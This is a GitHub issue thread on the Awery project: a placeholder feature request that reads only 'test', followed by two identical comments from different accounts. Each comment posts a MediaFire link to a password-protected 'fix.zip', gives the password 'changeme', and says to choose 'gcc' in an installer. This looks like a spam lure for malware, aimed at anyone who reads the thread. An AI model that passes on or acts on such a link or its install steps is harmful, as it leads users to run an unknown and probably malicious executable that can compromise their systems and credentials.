### ISSUE TITLE
test 

### ISSUE THREAD

**Issue by itsmechinmoy** [MrBoomDeveloper/Awery#78]
### Feature Summary

test

### Current Behavior
- [ ] Describe the current functionality or lack thereof.

### Proposed Solution
- [ ] Detail how the feature should work and any potential benefits.

### Considerations
- [ ] Mention any potential challenges or alternatives.

### Additional Context

test

### Submission Checklist

- [X] I have searched the existing issues and confirm that this feature has not been requested before.
- [X] I have provided a clear and descriptive title.
- [X] I am using the **[latest](https://github.com/mrboomdeveloper/awery/releases/latest)** version of Awery. If not, I have provided a reason for using an older version.
- [X] I understand that not all feature requests will be accepted, and if declined, I won't resubmit the same request.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
